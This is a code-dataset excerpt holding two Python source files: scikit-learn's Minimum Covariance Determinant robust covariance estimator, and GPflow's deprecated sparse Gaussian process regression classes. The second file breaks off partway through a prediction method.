text
stringlengths 12
1.05M
| repo_name
stringlengths 5
86
| path
stringlengths 4
191
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 12
1.05M
| keyword
listlengths 1
23
| text_hash
stringlengths 64
64
|
|---|---|---|---|---|---|---|---|
"""
Robust location and covariance estimators.
Here are implemented estimators that are resistant to outliers.
"""
# Author: Virgile Fritsch <virgile.fritsch@inria.fr>
#
# License: BSD 3 clause
import warnings
import numbers
import numpy as np
from scipy import linalg
from scipy.stats import chi2
from . import empirical_covariance, EmpiricalCovariance
from ..utils.extmath import fast_logdet
from ..utils import check_random_state, check_array
# Minimum Covariance Determinant
# Implementing of an algorithm by Rousseeuw & Van Driessen described in
# (A Fast Algorithm for the Minimum Covariance Determinant Estimator,
# 1999, American Statistical Association and the American Society
# for Quality, TECHNOMETRICS)
# XXX Is this really a public function? It's not listed in the docs or
# exported by sklearn.covariance. Deprecate?
def c_step(X, n_support, remaining_iterations=30, initial_estimates=None,
verbose=False, cov_computation_method=empirical_covariance,
random_state=None):
"""C_step procedure described in [Rouseeuw1984]_ aiming at computing MCD.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Data set in which we look for the n_support observations whose
scatter matrix has minimum determinant.
n_support : int
Number of observations to compute the robust estimates of location
and covariance from. This parameter must be greater than
`n_samples / 2`.
remaining_iterations : int, default=30
Number of iterations to perform.
According to [Rouseeuw1999]_, two iterations are sufficient to get
close to the minimum, and we never need more than 30 to reach
convergence.
initial_estimates : tuple of shape (2,), default=None
Initial estimates of location and shape from which to run the c_step
procedure:
- initial_estimates[0]: an initial location estimate
- initial_estimates[1]: an initial covariance estimate
verbose : bool, default=False
Verbose mode.
cov_computation_method : callable, \
default=:func:`sklearn.covariance.empirical_covariance`
The function which will be used to compute the covariance.
Must return array of shape (n_features, n_features).
random_state : int, RandomState instance or None, default=None
Determines the pseudo random number generator for shuffling the data.
Pass an int for reproducible results across multiple function calls.
See :term: `Glossary <random_state>`.
Returns
-------
location : ndarray of shape (n_features,)
Robust location estimates.
covariance : ndarray of shape (n_features, n_features)
Robust covariance estimates.
support : ndarray of shape (n_samples,)
A mask for the `n_support` observations whose scatter matrix has
minimum determinant.
References
----------
.. [Rouseeuw1999] A Fast Algorithm for the Minimum Covariance Determinant
Estimator, 1999, American Statistical Association and the American
Society for Quality, TECHNOMETRICS
"""
X = np.asarray(X)
random_state = check_random_state(random_state)
return _c_step(X, n_support, remaining_iterations=remaining_iterations,
initial_estimates=initial_estimates, verbose=verbose,
cov_computation_method=cov_computation_method,
random_state=random_state)
def _c_step(X, n_support, random_state, remaining_iterations=30,
initial_estimates=None, verbose=False,
cov_computation_method=empirical_covariance):
n_samples, n_features = X.shape
dist = np.inf
# Initialisation
support = np.zeros(n_samples, dtype=bool)
if initial_estimates is None:
# compute initial robust estimates from a random subset
support[random_state.permutation(n_samples)[:n_support]] = True
else:
# get initial robust estimates from the function parameters
location = initial_estimates[0]
covariance = initial_estimates[1]
# run a special iteration for that case (to get an initial support)
precision = linalg.pinvh(covariance)
X_centered = X - location
dist = (np.dot(X_centered, precision) * X_centered).sum(1)
# compute new estimates
support[np.argsort(dist)[:n_support]] = True
X_support = X[support]
location = X_support.mean(0)
covariance = cov_computation_method(X_support)
# Iterative procedure for Minimum Covariance Determinant computation
det = fast_logdet(covariance)
# If the data already has singular covariance, calculate the precision,
# as the loop below will not be entered.
if np.isinf(det):
precision = linalg.pinvh(covariance)
previous_det = np.inf
while (det < previous_det and remaining_iterations > 0
and not np.isinf(det)):
# save old estimates values
previous_location = location
previous_covariance = covariance
previous_det = det
previous_support = support
# compute a new support from the full data set mahalanobis distances
precision = linalg.pinvh(covariance)
X_centered = X - location
dist = (np.dot(X_centered, precision) * X_centered).sum(axis=1)
# compute new estimates
support = np.zeros(n_samples, dtype=bool)
support[np.argsort(dist)[:n_support]] = True
X_support = X[support]
location = X_support.mean(axis=0)
covariance = cov_computation_method(X_support)
det = fast_logdet(covariance)
# update remaining iterations for early stopping
remaining_iterations -= 1
previous_dist = dist
dist = (np.dot(X - location, precision) * (X - location)).sum(axis=1)
# Check if best fit already found (det => 0, logdet => -inf)
if np.isinf(det):
results = location, covariance, det, support, dist
# Check convergence
if np.allclose(det, previous_det):
# c_step procedure converged
if verbose:
print("Optimal couple (location, covariance) found before"
" ending iterations (%d left)" % (remaining_iterations))
results = location, covariance, det, support, dist
elif det > previous_det:
# determinant has increased (should not happen)
warnings.warn("Determinant has increased; this should not happen: "
"log(det) > log(previous_det) (%.15f > %.15f). "
"You may want to try with a higher value of "
"support_fraction (current value: %.3f)."
% (det, previous_det, n_support / n_samples),
RuntimeWarning)
results = previous_location, previous_covariance, \
previous_det, previous_support, previous_dist
# Check early stopping
if remaining_iterations == 0:
if verbose:
print('Maximum number of iterations reached')
results = location, covariance, det, support, dist
return results
def select_candidates(X, n_support, n_trials, select=1, n_iter=30,
verbose=False,
cov_computation_method=empirical_covariance,
random_state=None):
"""Finds the best pure subset of observations to compute MCD from it.
The purpose of this function is to find the best sets of n_support
observations with respect to a minimization of their covariance
matrix determinant. Equivalently, it removes n_samples-n_support
observations to construct what we call a pure data set (i.e. not
containing outliers). The list of the observations of the pure
data set is referred to as the `support`.
Starting from a random support, the pure data set is found by the
c_step procedure introduced by Rousseeuw and Van Driessen in
[RV]_.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Data (sub)set in which we look for the n_support purest observations.
n_support : int
The number of samples the pure data set must contain.
This parameter must be in the range `[(n + p + 1)/2] < n_support < n`.
n_trials : int or tuple of shape (2,)
Number of different initial sets of observations from which to
run the algorithm. This parameter should be a strictly positive
integer.
Instead of giving a number of trials to perform, one can provide a
list of initial estimates that will be used to iteratively run
c_step procedures. In this case:
- n_trials[0]: array-like, shape (n_trials, n_features)
is the list of `n_trials` initial location estimates
- n_trials[1]: array-like, shape (n_trials, n_features, n_features)
is the list of `n_trials` initial covariances estimates
select : int, default=1
Number of best candidates results to return. This parameter must be
a strictly positive integer.
n_iter : int, default=30
Maximum number of iterations for the c_step procedure.
(2 is enough to be close to the final solution. "Never" exceeds 20).
This parameter must be a strictly positive integer.
verbose : bool, default=False
Control the output verbosity.
cov_computation_method : callable, \
default=:func:`sklearn.covariance.empirical_covariance`
The function which will be used to compute the covariance.
Must return an array of shape (n_features, n_features).
random_state : int, RandomState instance or None, default=None
Determines the pseudo random number generator for shuffling the data.
Pass an int for reproducible results across multiple function calls.
See :term: `Glossary <random_state>`.
See Also
---------
c_step
Returns
-------
best_locations : ndarray of shape (select, n_features)
The `select` location estimates computed from the `select` best
supports found in the data set (`X`).
best_covariances : ndarray of shape (select, n_features, n_features)
The `select` covariance estimates computed from the `select`
best supports found in the data set (`X`).
best_supports : ndarray of shape (select, n_samples)
The `select` best supports found in the data set (`X`).
References
----------
.. [RV] A Fast Algorithm for the Minimum Covariance Determinant
Estimator, 1999, American Statistical Association and the American
Society for Quality, TECHNOMETRICS
"""
random_state = check_random_state(random_state)
if isinstance(n_trials, numbers.Integral):
run_from_estimates = False
elif isinstance(n_trials, tuple):
run_from_estimates = True
estimates_list = n_trials
n_trials = estimates_list[0].shape[0]
else:
raise TypeError("Invalid 'n_trials' parameter, expected tuple or "
" integer, got %s (%s)" % (n_trials, type(n_trials)))
# compute `n_trials` location and shape estimates candidates in the subset
all_estimates = []
if not run_from_estimates:
# perform `n_trials` computations from random initial supports
for j in range(n_trials):
all_estimates.append(
_c_step(
X, n_support, remaining_iterations=n_iter, verbose=verbose,
cov_computation_method=cov_computation_method,
random_state=random_state))
else:
# perform computations from every given initial estimates
for j in range(n_trials):
initial_estimates = (estimates_list[0][j], estimates_list[1][j])
all_estimates.append(_c_step(
X, n_support, remaining_iterations=n_iter,
initial_estimates=initial_estimates, verbose=verbose,
cov_computation_method=cov_computation_method,
random_state=random_state))
all_locs_sub, all_covs_sub, all_dets_sub, all_supports_sub, all_ds_sub = \
zip(*all_estimates)
# find the `n_best` best results among the `n_trials` ones
index_best = np.argsort(all_dets_sub)[:select]
best_locations = np.asarray(all_locs_sub)[index_best]
best_covariances = np.asarray(all_covs_sub)[index_best]
best_supports = np.asarray(all_supports_sub)[index_best]
best_ds = np.asarray(all_ds_sub)[index_best]
return best_locations, best_covariances, best_supports, best_ds
def fast_mcd(X, support_fraction=None,
cov_computation_method=empirical_covariance,
random_state=None):
"""Estimates the Minimum Covariance Determinant matrix.
Read more in the :ref:`User Guide <robust_covariance>`.
Parameters
----------
X : array-like of shape (n_samples, n_features)
The data matrix, with p features and n samples.
support_fraction : float, default=None
The proportion of points to be included in the support of the raw
MCD estimate. Default is `None`, which implies that the minimum
value of `support_fraction` will be used within the algorithm:
`(n_sample + n_features + 1) / 2`. This parameter must be in the
range (0, 1).
cov_computation_method : callable, \
default=:func:`sklearn.covariance.empirical_covariance`
The function which will be used to compute the covariance.
Must return an array of shape (n_features, n_features).
random_state : int, RandomState instance or None, default=None
Determines the pseudo random number generator for shuffling the data.
Pass an int for reproducible results across multiple function calls.
See :term: `Glossary <random_state>`.
Returns
-------
location : ndarray of shape (n_features,)
Robust location of the data.
covariance : ndarray of shape (n_features, n_features)
Robust covariance of the features.
support : ndarray of shape (n_samples,), dtype=bool
A mask of the observations that have been used to compute
the robust location and covariance estimates of the data set.
Notes
-----
The FastMCD algorithm has been introduced by Rousseuw and Van Driessen
in "A Fast Algorithm for the Minimum Covariance Determinant Estimator,
1999, American Statistical Association and the American Society
for Quality, TECHNOMETRICS".
The principle is to compute robust estimates and random subsets before
pooling them into a larger subsets, and finally into the full data set.
Depending on the size of the initial sample, we have one, two or three
such computation levels.
Note that only raw estimates are returned. If one is interested in
the correction and reweighting steps described in [RouseeuwVan]_,
see the MinCovDet object.
References
----------
.. [RouseeuwVan] A Fast Algorithm for the Minimum Covariance
Determinant Estimator, 1999, American Statistical Association
and the American Society for Quality, TECHNOMETRICS
.. [Butler1993] R. W. Butler, P. L. Davies and M. Jhun,
Asymptotics For The Minimum Covariance Determinant Estimator,
The Annals of Statistics, 1993, Vol. 21, No. 3, 1385-1400
"""
random_state = check_random_state(random_state)
X = check_array(X, ensure_min_samples=2, estimator='fast_mcd')
n_samples, n_features = X.shape
# minimum breakdown value
if support_fraction is None:
n_support = int(np.ceil(0.5 * (n_samples + n_features + 1)))
else:
n_support = int(support_fraction * n_samples)
# 1-dimensional case quick computation
# (Rousseeuw, P. J. and Leroy, A. M. (2005) References, in Robust
# Regression and Outlier Detection, John Wiley & Sons, chapter 4)
if n_features == 1:
if n_support < n_samples:
# find the sample shortest halves
X_sorted = np.sort(np.ravel(X))
diff = X_sorted[n_support:] - X_sorted[:(n_samples - n_support)]
halves_start = np.where(diff == np.min(diff))[0]
# take the middle points' mean to get the robust location estimate
location = 0.5 * (X_sorted[n_support + halves_start] +
X_sorted[halves_start]).mean()
support = np.zeros(n_samples, dtype=bool)
X_centered = X - location
support[np.argsort(np.abs(X_centered), 0)[:n_support]] = True
covariance = np.asarray([[np.var(X[support])]])
location = np.array([location])
# get precision matrix in an optimized way
precision = linalg.pinvh(covariance)
dist = (np.dot(X_centered, precision) * (X_centered)).sum(axis=1)
else:
support = np.ones(n_samples, dtype=bool)
covariance = np.asarray([[np.var(X)]])
location = np.asarray([np.mean(X)])
X_centered = X - location
# get precision matrix in an optimized way
precision = linalg.pinvh(covariance)
dist = (np.dot(X_centered, precision) * (X_centered)).sum(axis=1)
# Starting FastMCD algorithm for p-dimensional case
if (n_samples > 500) and (n_features > 1):
# 1. Find candidate supports on subsets
# a. split the set in subsets of size ~ 300
n_subsets = n_samples // 300
n_samples_subsets = n_samples // n_subsets
samples_shuffle = random_state.permutation(n_samples)
h_subset = int(np.ceil(n_samples_subsets *
(n_support / float(n_samples))))
# b. perform a total of 500 trials
n_trials_tot = 500
# c. select 10 best (location, covariance) for each subset
n_best_sub = 10
n_trials = max(10, n_trials_tot // n_subsets)
n_best_tot = n_subsets * n_best_sub
all_best_locations = np.zeros((n_best_tot, n_features))
try:
all_best_covariances = np.zeros((n_best_tot, n_features,
n_features))
except MemoryError:
# The above is too big. Let's try with something much small
# (and less optimal)
n_best_tot = 10
all_best_covariances = np.zeros((n_best_tot, n_features,
n_features))
n_best_sub = 2
for i in range(n_subsets):
low_bound = i * n_samples_subsets
high_bound = low_bound + n_samples_subsets
current_subset = X[samples_shuffle[low_bound:high_bound]]
best_locations_sub, best_covariances_sub, _, _ = select_candidates(
current_subset, h_subset, n_trials,
select=n_best_sub, n_iter=2,
cov_computation_method=cov_computation_method,
random_state=random_state)
subset_slice = np.arange(i * n_best_sub, (i + 1) * n_best_sub)
all_best_locations[subset_slice] = best_locations_sub
all_best_covariances[subset_slice] = best_covariances_sub
# 2. Pool the candidate supports into a merged set
# (possibly the full dataset)
n_samples_merged = min(1500, n_samples)
h_merged = int(np.ceil(n_samples_merged *
(n_support / float(n_samples))))
if n_samples > 1500:
n_best_merged = 10
else:
n_best_merged = 1
# find the best couples (location, covariance) on the merged set
selection = random_state.permutation(n_samples)[:n_samples_merged]
locations_merged, covariances_merged, supports_merged, d = \
select_candidates(
X[selection], h_merged,
n_trials=(all_best_locations, all_best_covariances),
select=n_best_merged,
cov_computation_method=cov_computation_method,
random_state=random_state)
# 3. Finally get the overall best (locations, covariance) couple
if n_samples < 1500:
# directly get the best couple (location, covariance)
location = locations_merged[0]
covariance = covariances_merged[0]
support = np.zeros(n_samples, dtype=bool)
dist = np.zeros(n_samples)
support[selection] = supports_merged[0]
dist[selection] = d[0]
else:
# select the best couple on the full dataset
locations_full, covariances_full, supports_full, d = \
select_candidates(
X, n_support,
n_trials=(locations_merged, covariances_merged),
select=1,
cov_computation_method=cov_computation_method,
random_state=random_state)
location = locations_full[0]
covariance = covariances_full[0]
support = supports_full[0]
dist = d[0]
elif n_features > 1:
# 1. Find the 10 best couples (location, covariance)
# considering two iterations
n_trials = 30
n_best = 10
locations_best, covariances_best, _, _ = select_candidates(
X, n_support, n_trials=n_trials, select=n_best, n_iter=2,
cov_computation_method=cov_computation_method,
random_state=random_state)
# 2. Select the best couple on the full dataset amongst the 10
locations_full, covariances_full, supports_full, d = select_candidates(
X, n_support, n_trials=(locations_best, covariances_best),
select=1, cov_computation_method=cov_computation_method,
random_state=random_state)
location = locations_full[0]
covariance = covariances_full[0]
support = supports_full[0]
dist = d[0]
return location, covariance, support, dist
class MinCovDet(EmpiricalCovariance):
"""Minimum Covariance Determinant (MCD): robust estimator of covariance.
The Minimum Covariance Determinant covariance estimator is to be applied
on Gaussian-distributed data, but could still be relevant on data
drawn from a unimodal, symmetric distribution. It is not meant to be used
with multi-modal data (the algorithm used to fit a MinCovDet object is
likely to fail in such a case).
One should consider projection pursuit methods to deal with multi-modal
datasets.
Read more in the :ref:`User Guide <robust_covariance>`.
Parameters
----------
store_precision : bool, default=True
Specify if the estimated precision is stored.
assume_centered : bool, default=False
If True, the support of the robust location and the covariance
estimates is computed, and a covariance estimate is recomputed from
it, without centering the data.
Useful to work with data whose mean is significantly equal to
zero but is not exactly zero.
If False, the robust location and covariance are directly computed
with the FastMCD algorithm without additional treatment.
support_fraction : float, default=None
The proportion of points to be included in the support of the raw
MCD estimate. Default is None, which implies that the minimum
value of support_fraction will be used within the algorithm:
`(n_sample + n_features + 1) / 2`. The parameter must be in the range
(0, 1).
random_state : int, RandomState instance or None, default=None
Determines the pseudo random number generator for shuffling the data.
Pass an int for reproducible results across multiple function calls.
See :term: `Glossary <random_state>`.
Attributes
----------
raw_location_ : ndarray of shape (n_features,)
The raw robust estimated location before correction and re-weighting.
raw_covariance_ : ndarray of shape (n_features, n_features)
The raw robust estimated covariance before correction and re-weighting.
raw_support_ : ndarray of shape (n_samples,)
A mask of the observations that have been used to compute
the raw robust estimates of location and shape, before correction
and re-weighting.
location_ : ndarray of shape (n_features,)
Estimated robust location.
covariance_ : ndarray of shape (n_features, n_features)
Estimated robust covariance matrix.
precision_ : ndarray of shape (n_features, n_features)
Estimated pseudo inverse matrix.
(stored only if store_precision is True)
support_ : ndarray of shape (n_samples,)
A mask of the observations that have been used to compute
the robust estimates of location and shape.
dist_ : ndarray of shape (n_samples,)
Mahalanobis distances of the training set (on which :meth:`fit` is
called) observations.
n_features_in_ : int
Number of features seen during :term:`fit`.
.. versionadded:: 0.24
Examples
--------
>>> import numpy as np
>>> from sklearn.covariance import MinCovDet
>>> from sklearn.datasets import make_gaussian_quantiles
>>> real_cov = np.array([[.8, .3],
... [.3, .4]])
>>> rng = np.random.RandomState(0)
>>> X = rng.multivariate_normal(mean=[0, 0],
... cov=real_cov,
... size=500)
>>> cov = MinCovDet(random_state=0).fit(X)
>>> cov.covariance_
array([[0.7411..., 0.2535...],
[0.2535..., 0.3053...]])
>>> cov.location_
array([0.0813... , 0.0427...])
References
----------
.. [Rouseeuw1984] P. J. Rousseeuw. Least median of squares regression.
J. Am Stat Ass, 79:871, 1984.
.. [Rousseeuw] A Fast Algorithm for the Minimum Covariance Determinant
Estimator, 1999, American Statistical Association and the American
Society for Quality, TECHNOMETRICS
.. [ButlerDavies] R. W. Butler, P. L. Davies and M. Jhun,
Asymptotics For The Minimum Covariance Determinant Estimator,
The Annals of Statistics, 1993, Vol. 21, No. 3, 1385-1400
"""
_nonrobust_covariance = staticmethod(empirical_covariance)
def __init__(self, *, store_precision=True, assume_centered=False,
support_fraction=None, random_state=None):
self.store_precision = store_precision
self.assume_centered = assume_centered
self.support_fraction = support_fraction
self.random_state = random_state
def fit(self, X, y=None):
"""Fits a Minimum Covariance Determinant with the FastMCD algorithm.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Training data, where `n_samples` is the number of samples
and `n_features` is the number of features.
y : Ignored
Not used, present for API consistency by convention.
Returns
-------
self : object
"""
X = self._validate_data(X, ensure_min_samples=2, estimator='MinCovDet')
random_state = check_random_state(self.random_state)
n_samples, n_features = X.shape
# check that the empirical covariance is full rank
if (linalg.svdvals(np.dot(X.T, X)) > 1e-8).sum() != n_features:
warnings.warn("The covariance matrix associated to your dataset "
"is not full rank")
# compute and store raw estimates
raw_location, raw_covariance, raw_support, raw_dist = fast_mcd(
X, support_fraction=self.support_fraction,
cov_computation_method=self._nonrobust_covariance,
random_state=random_state)
if self.assume_centered:
raw_location = np.zeros(n_features)
raw_covariance = self._nonrobust_covariance(X[raw_support],
assume_centered=True)
# get precision matrix in an optimized way
precision = linalg.pinvh(raw_covariance)
raw_dist = np.sum(np.dot(X, precision) * X, 1)
self.raw_location_ = raw_location
self.raw_covariance_ = raw_covariance
self.raw_support_ = raw_support
self.location_ = raw_location
self.support_ = raw_support
self.dist_ = raw_dist
# obtain consistency at normal models
self.correct_covariance(X)
# re-weight estimator
self.reweight_covariance(X)
return self
def correct_covariance(self, data):
"""Apply a correction to raw Minimum Covariance Determinant estimates.
Correction using the empirical correction factor suggested
by Rousseeuw and Van Driessen in [RVD]_.
Parameters
----------
data : array-like of shape (n_samples, n_features)
The data matrix, with p features and n samples.
The data set must be the one which was used to compute
the raw estimates.
Returns
-------
covariance_corrected : ndarray of shape (n_features, n_features)
Corrected robust covariance estimate.
References
----------
.. [RVD] A Fast Algorithm for the Minimum Covariance
Determinant Estimator, 1999, American Statistical Association
and the American Society for Quality, TECHNOMETRICS
"""
# Check that the covariance of the support data is not equal to 0.
# Otherwise self.dist_ = 0 and thus correction = 0.
n_samples = len(self.dist_)
n_support = np.sum(self.support_)
if n_support < n_samples and np.allclose(self.raw_covariance_, 0):
raise ValueError('The covariance matrix of the support data '
'is equal to 0, try to increase support_fraction')
correction = np.median(self.dist_) / chi2(data.shape[1]).isf(0.5)
covariance_corrected = self.raw_covariance_ * correction
self.dist_ /= correction
return covariance_corrected
def reweight_covariance(self, data):
"""Re-weight raw Minimum Covariance Determinant estimates.
Re-weight observations using Rousseeuw's method (equivalent to
deleting outlying observations from the data set before
computing location and covariance estimates) described
in [RVDriessen]_.
Parameters
----------
data : array-like of shape (n_samples, n_features)
The data matrix, with p features and n samples.
The data set must be the one which was used to compute
the raw estimates.
Returns
-------
location_reweighted : ndarray of shape (n_features,)
Re-weighted robust location estimate.
covariance_reweighted : ndarray of shape (n_features, n_features)
Re-weighted robust covariance estimate.
support_reweighted : ndarray of shape (n_samples,), dtype=bool
A mask of the observations that have been used to compute
the re-weighted robust location and covariance estimates.
References
----------
.. [RVDriessen] A Fast Algorithm for the Minimum Covariance
Determinant Estimator, 1999, American Statistical Association
and the American Society for Quality, TECHNOMETRICS
"""
n_samples, n_features = data.shape
mask = self.dist_ < chi2(n_features).isf(0.025)
if self.assume_centered:
location_reweighted = np.zeros(n_features)
else:
location_reweighted = data[mask].mean(0)
covariance_reweighted = self._nonrobust_covariance(
data[mask], assume_centered=self.assume_centered)
support_reweighted = np.zeros(n_samples, dtype=bool)
support_reweighted[mask] = True
self._set_covariance(covariance_reweighted)
self.location_ = location_reweighted
self.support_ = support_reweighted
X_centered = data - self.location_
self.dist_ = np.sum(
np.dot(X_centered, self.get_precision()) * X_centered, 1)
return location_reweighted, covariance_reweighted, support_reweighted
|
kevin-intel/scikit-learn
|
sklearn/covariance/_robust_covariance.py
|
Python
|
bsd-3-clause
| 32,366
|
[
"Gaussian"
] |
8b53654689ac541ab6f1ff78896ed3474eab046f3fabcad86026bd389f9a7220
|
# Copyright 2016-2020 The GPflow Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import namedtuple
from typing import Optional, Tuple
import numpy as np
import tensorflow as tf
from .. import likelihoods, posteriors
from ..base import InputData, MeanAndVariance, RegressionData
from ..config import default_float, default_jitter
from ..covariances.dispatch import Kuf, Kuu
from ..inducing_variables import InducingPoints
from ..kernels import Kernel
from ..mean_functions import MeanFunction
from ..utilities import add_noise_cov, to_default_float
from .model import GPModel
from .training_mixins import InternalDataTrainingLossMixin
from .util import InducingPointsLike, data_input_to_tensor, inducingpoint_wrapper
class SGPRBase_deprecated(GPModel, InternalDataTrainingLossMixin):
"""
Common base class for SGPR and GPRFITC that provides the common __init__
and upper_bound() methods.
"""
def __init__(
self,
data: RegressionData,
kernel: Kernel,
inducing_variable: InducingPointsLike,
*,
mean_function: Optional[MeanFunction] = None,
num_latent_gps: Optional[int] = None,
noise_variance: float = 1.0,
):
"""
`data`: a tuple of (X, Y), where the inputs X has shape [N, D]
and the outputs Y has shape [N, R].
`inducing_variable`: an InducingPoints instance or a matrix of
the pseudo inputs Z, of shape [M, D].
`kernel`, `mean_function` are appropriate GPflow objects
This method only works with a Gaussian likelihood, its variance is
initialized to `noise_variance`.
"""
likelihood = likelihoods.Gaussian(noise_variance)
X_data, Y_data = data_input_to_tensor(data)
num_latent_gps = Y_data.shape[-1] if num_latent_gps is None else num_latent_gps
super().__init__(kernel, likelihood, mean_function, num_latent_gps=num_latent_gps)
self.data = X_data, Y_data
self.num_data = X_data.shape[0]
self.inducing_variable: InducingPoints = inducingpoint_wrapper(inducing_variable)
def upper_bound(self) -> tf.Tensor:
"""
Upper bound for the sparse GP regression marginal likelihood. Note that
the same inducing points are used for calculating the upper bound, as are
used for computing the likelihood approximation. This may not lead to the
best upper bound. The upper bound can be tightened by optimising Z, just
like the lower bound. This is especially important in FITC, as FITC is
known to produce poor inducing point locations. An optimisable upper bound
can be found in https://github.com/markvdw/gp_upper.
The key reference is
::
@misc{titsias_2014,
title={Variational Inference for Gaussian and Determinantal Point Processes},
url={http://www2.aueb.gr/users/mtitsias/papers/titsiasNipsVar14.pdf},
publisher={Workshop on Advances in Variational Inference (NIPS 2014)},
author={Titsias, Michalis K.},
year={2014},
month={Dec}
}
The key quantity, the trace term, can be computed via
>>> _, v = conditionals.conditional(X, model.inducing_variable.Z, model.kernel,
... np.zeros((model.inducing_variable.num_inducing, 1)))
which computes each individual element of the trace term.
"""
X_data, Y_data = self.data
num_data = to_default_float(tf.shape(Y_data)[0])
Kdiag = self.kernel(X_data, full_cov=False)
kuu = Kuu(self.inducing_variable, self.kernel, jitter=default_jitter())
kuf = Kuf(self.inducing_variable, self.kernel, X_data)
I = tf.eye(tf.shape(kuu)[0], dtype=default_float())
L = tf.linalg.cholesky(kuu)
A = tf.linalg.triangular_solve(L, kuf, lower=True)
AAT = tf.linalg.matmul(A, A, transpose_b=True)
B = I + AAT / self.likelihood.variance
LB = tf.linalg.cholesky(B)
# Using the Trace bound, from Titsias' presentation
c = tf.reduce_sum(Kdiag) - tf.reduce_sum(tf.square(A))
# Alternative bound on max eigenval:
corrected_noise = self.likelihood.variance + c
const = -0.5 * num_data * tf.math.log(2 * np.pi * self.likelihood.variance)
logdet = -tf.reduce_sum(tf.math.log(tf.linalg.diag_part(LB)))
err = Y_data - self.mean_function(X_data)
LC = tf.linalg.cholesky(I + AAT / corrected_noise)
v = tf.linalg.triangular_solve(LC, tf.linalg.matmul(A, err) / corrected_noise, lower=True)
quad = -0.5 * tf.reduce_sum(tf.square(err)) / corrected_noise + 0.5 * tf.reduce_sum(
tf.square(v)
)
return const + logdet + quad
class SGPR_deprecated(SGPRBase_deprecated):
"""
Sparse Variational GP regression. The key reference is
::
@inproceedings{titsias2009variational,
title={Variational learning of inducing variables in
sparse Gaussian processes},
author={Titsias, Michalis K},
booktitle={International Conference on
Artificial Intelligence and Statistics},
pages={567--574},
year={2009}
}
"""
CommonTensors = namedtuple("CommonTensors", ["A", "B", "LB", "AAT", "L"])
# type-ignore is because of changed method signature:
def maximum_log_likelihood_objective(self) -> tf.Tensor: # type: ignore
return self.elbo()
def _common_calculation(self) -> "SGPR.CommonTensors":
"""
Matrices used in log-det calculation
:return: A , B, LB, AAT with :math:`LLᵀ = Kᵤᵤ , A = L⁻¹K_{uf}/σ, AAT = AAᵀ,
B = AAT+I, LBLBᵀ = B`
A is M x N, B is M x M, LB is M x M, AAT is M x M
"""
x, _ = self.data
iv = self.inducing_variable
sigma_sq = self.likelihood.variance
kuf = Kuf(iv, self.kernel, x)
kuu = Kuu(iv, self.kernel, jitter=default_jitter())
L = tf.linalg.cholesky(kuu)
sigma = tf.sqrt(sigma_sq)
# Compute intermediate matrices
A = tf.linalg.triangular_solve(L, kuf, lower=True) / sigma
AAT = tf.linalg.matmul(A, A, transpose_b=True)
B = add_noise_cov(AAT, tf.cast(1.0, AAT.dtype))
LB = tf.linalg.cholesky(B)
return self.CommonTensors(A, B, LB, AAT, L)
def logdet_term(self, common: "SGPR.CommonTensors") -> tf.Tensor:
"""
Bound from Jensen's Inequality:
.. math::
log |K + σ²I| <= log |Q + σ²I| + N * log (1 + tr(K - Q)/(σ²N))
:param common: A named tuple containing matrices that will be used
:return: log_det, lower bound on -.5 * output_dim * log |K + σ²I|
"""
LB = common.LB
AAT = common.AAT
x, y = self.data
num_data = to_default_float(tf.shape(x)[0])
outdim = to_default_float(tf.shape(y)[1])
kdiag = self.kernel(x, full_cov=False)
sigma_sq = self.likelihood.variance
# tr(K) / σ²
trace_k = tf.reduce_sum(kdiag) / sigma_sq
# tr(Q) / σ²
trace_q = tf.reduce_sum(tf.linalg.diag_part(AAT))
# tr(K - Q) / σ²
trace = trace_k - trace_q
# 0.5 * log(det(B))
half_logdet_b = tf.reduce_sum(tf.math.log(tf.linalg.diag_part(LB)))
# N * log(σ²)
log_sigma_sq = num_data * tf.math.log(sigma_sq)
logdet_k = -outdim * (half_logdet_b + 0.5 * log_sigma_sq + 0.5 * trace)
return logdet_k
def quad_term(self, common: "SGPR.CommonTensors") -> tf.Tensor:
"""
:param common: A named tuple containing matrices that will be used
:return: Lower bound on -.5 yᵀ(K + σ²I)⁻¹y
"""
A = common.A
LB = common.LB
x, y = self.data
err = y - self.mean_function(x)
sigma_sq = self.likelihood.variance
sigma = tf.sqrt(sigma_sq)
Aerr = tf.linalg.matmul(A, err)
c = tf.linalg.triangular_solve(LB, Aerr, lower=True) / sigma
# σ⁻² yᵀy
err_inner_prod = tf.reduce_sum(tf.square(err)) / sigma_sq
c_inner_prod = tf.reduce_sum(tf.square(c))
quad = -0.5 * (err_inner_prod - c_inner_prod)
return quad
def elbo(self) -> tf.Tensor:
"""
Construct a tensorflow function to compute the bound on the marginal
likelihood. For a derivation of the terms in here, see the associated
SGPR notebook.
"""
common = self._common_calculation()
output_shape = tf.shape(self.data[-1])
num_data = to_default_float(output_shape[0])
output_dim = to_default_float(output_shape[1])
const = -0.5 * num_data * output_dim * np.log(2 * np.pi)
logdet = self.logdet_term(common)
quad = self.quad_term(common)
return const + logdet + quad
def predict_f(
self, Xnew: InputData, full_cov: bool = False, full_output_cov: bool = False
) -> MeanAndVariance:
# could copy into posterior into a fused version
"""
Compute the mean and variance of the latent function at some new points
Xnew. For a derivation of the terms in here, see the associated SGPR
notebook.
"""
X_data, Y_data = self.data
num_inducing = self.inducing_variable.num_inducing
err = Y_data - self.mean_function(X_data)
kuf = Kuf(self.inducing_variable, self.kernel, X_data)
kuu = Kuu(self.inducing_variable, self.kernel, jitter=default_jitter())
Kus = Kuf(self.inducing_variable, self.kernel, Xnew)
sigma = tf.sqrt(self.likelihood.variance)
L = tf.linalg.cholesky(kuu)
A = tf.linalg.triangular_solve(L, kuf, lower=True) / sigma
B = tf.linalg.matmul(A, A, transpose_b=True) + tf.eye(
num_inducing, dtype=default_float()
) # cache qinv
LB = tf.linalg.cholesky(B)
Aerr = tf.linalg.matmul(A, err)
c = tf.linalg.triangular_solve(LB, Aerr, lower=True) / sigma
tmp1 = tf.linalg.triangular_solve(L, Kus, lower=True)
